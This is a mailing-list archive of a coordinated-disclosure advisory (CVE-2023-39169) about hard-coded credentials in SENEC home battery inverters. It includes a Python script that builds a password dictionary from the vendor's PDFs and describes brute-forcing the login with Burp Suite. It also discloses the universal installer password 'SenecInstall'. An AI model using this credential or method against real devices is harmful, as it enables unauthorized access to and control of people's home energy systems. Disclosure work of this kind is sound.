[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Use of Hard-coded Credentials - CVE-2023-39169
From: Phos4Me via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2023-11-13 10:50:12
Message-ID: dI8TM_hYbf_97gyICJ8zJA-B6mMJUthVZQeHfVYlelXgdNiHs4iHY337okSJ_F-o6esqDc8zx8JGHtv1emx_6sF6Dv_qpeyrD43hWau4ERo= () proton ! me
[Download RAW message or body]
[Attachment #2 (multipart/signed)]
[Attachment #4 (multipart/mixed)]
> > Advisory ID: Ph0s-2023-003
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-307: Improper Restriction of Excessive
> > Authentication Attempts
> > CWE-798: Use of Hard-coded Credentials
> >
> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
> >
> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6
> >
> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39169
> > Author of Advisory: Ph0s[4], R0ckE7
> >
> > ********************************************************************************
> >
> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.
> >
> > About Senec:
> > We are SENEC
> >
> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don't do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> >
> > About SENEC Home:
> >
> > SENEC.Home: The smart electricity storage device for your home
> >
> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household's energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.
> >
> > ********************************************************************************
> >
> > Vulnerability Details:
> >
> > Based on the previously identified hard-coded username in CVE-2023-39167 and
> > CVE-2023-39168 all technical requirements were met to target the password.
> > Since the username installateur is quite straightforward in the sense of
> > guessable, it was decided to perform a dictonary-type brute force attack.
> > For this purpose, all related PDF documents were downloaded to create a password
> > list specifically tailored to SENEC.Inverter.
> > Source of the Documents: https://senec.com/au/company/downloads
> >
> > ********************************************************************************
> >
> > Proof of Concept (PoC):
> >
> > The attack consists of the following steps:
> >
> > 1. parse the documents :
> > import argparse
> > import glob
> > import string
> > import fitz
> >
> > def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):
> > pdf_text = ""
> > for file in glob.glob(f"{pdf_directory}/*.pdf"):
> > pdf = fitz.open(file)
> > for page in pdf:
> > pdf_text += page.get_text()
> >
> > pdf_words = set(
> > [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]
> > )
> > senec_password = set(
> > [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]
> > )
> >
> > with open("senec-password.txt", mode="w", encoding="utf-8") as fd:
> > fd.write('\n'.join(senec_password))
> >
> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")
> > parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,
> > help="pdf storage location")
> > parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,
> > help="password prefix")
> > parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,
> > help="password suffix")
> > args = parser.parse_args()
> > get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)
> >
> > 2. work with the output:
> > The Python script extracts all words from all PDF documents and allows to add a prefix
> > and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix} ,
> > such as the following:
> > ***** cut *******
> > Senecmoribundity
> > SenecCleaning
> > Senecdusts
> > Senecclinical
> > Senecaggregation
> > Senecstubborn
> > Senecstorages
> > SenecDecommissioning
> > SenecInstall
> > Senecmany
> > ***** cut ********
> >
> > 3) use the list within burpsuite
> > The password lists were then used in Burp Suite Professional, a tool
> > specifically designed for web application security testing, to perform an
> > automated brute force attack.
> > The list shown above as an excerpt with the prefix Senec and no suffix was
> > finally successful in executing the attack.
> > It could be determined that the password "SenecInstall" is valid for all
> > SENEC.Inverter devices.
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Disclosure Timeline:
> >
> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> >
> > ************************************************************************
> >
> > Researcher:
> > Ph0s[4], R0ckE7
> >
> > ************************************************************************
> >
> > Disclaimer:
> >
> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > Copyright:
> >
> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/
["publickey - Phos4Me@proton.me - 0x3F4F673D.asc" (application/pgp-keys)]
["signature.asc" (application/pgp-signature)]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic